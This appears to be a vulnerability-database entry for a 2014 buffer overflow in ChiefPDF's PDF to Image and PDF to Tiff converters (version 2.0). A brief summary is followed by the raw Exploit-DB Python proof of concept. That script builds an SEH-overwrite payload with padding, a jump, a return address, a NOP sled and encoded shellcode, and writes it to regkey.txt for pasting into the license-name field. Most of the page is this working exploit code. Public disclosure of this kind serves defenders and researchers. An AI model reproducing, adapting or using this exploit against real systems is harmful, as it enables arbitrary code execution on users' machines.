ChiefPDF Software Buffer Overflow

vendor:

PDF to Image Converter, PDF to Image Converter Free, PDF to Tiff Converter, PDF to Tiff Converter Free

by:

metacom

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: PDF to Image Converter, PDF to Image Converter Free, PDF to Tiff Converter, PDF to Tiff Converter Free

Affected Version From: 2

Affected Version To: 2

Patch Exists: YES

Related CWE: N/A

CPE: chiefpdf

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win-Xp-sp3, Win-7, Win-8.1

2014

ChiefPDF Software Buffer Overflow

ChiefPDF Software Buffer Overflow is a vulnerability in ChiefPDF Software which allows an attacker to execute arbitrary code by overflowing a buffer in the program. The vulnerability affects PDF to Image Converter 2.0, PDF to Image Converter Free 2.0, PDF to Tiff Converter 2.0, and PDF to Tiff Converter Free 2.0. The exploit is triggered when a maliciously crafted string is pasted into the 'Registration - License Name' field. The exploit code is written in Python and is available on the author's website.

Mitigation:

Users should avoid downloading and installing software from untrusted sources. Additionally, users should ensure that all software is up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

#!/usr/bin/python
#Exploit Title:ChiefPDF Software Buffer Overflow 
#vulnerable programs:
#PDF to Image Converter 2.0
#PDF to Image Converter Free 2.0
#PDF to Tiff Converter 2.0
#PDF to Tiff Converter Free 2.0
#Software Link:http://www.soft32.com/publishers/chiefpdf/
#Author: metacom - twitter.com/m3tac0m
#Tested on: Win-Xp-sp3, Win-7, Win-8.1

#How to use:Copy the AAAA...string from regkey.txt and paste->Registration - License Name: 
buffer="A" * 544
buffer+="\xeb\x06\x90\x90"
buffer+="\x8B\x89\x03\x10"# 1003898B   5E   POP ESI 
buffer+="\x90" * 80
buffer+=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e"
"\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6"
"\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19"
"\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c"
"\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7"
"\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9"
"\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67"
"\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4"
"\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5"
"\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66"
"\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37"
"\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20"
"\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4"
"\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c"
"\xea\x47")
file = open('regkey.txt','wb')
file.write(buffer);
file.close()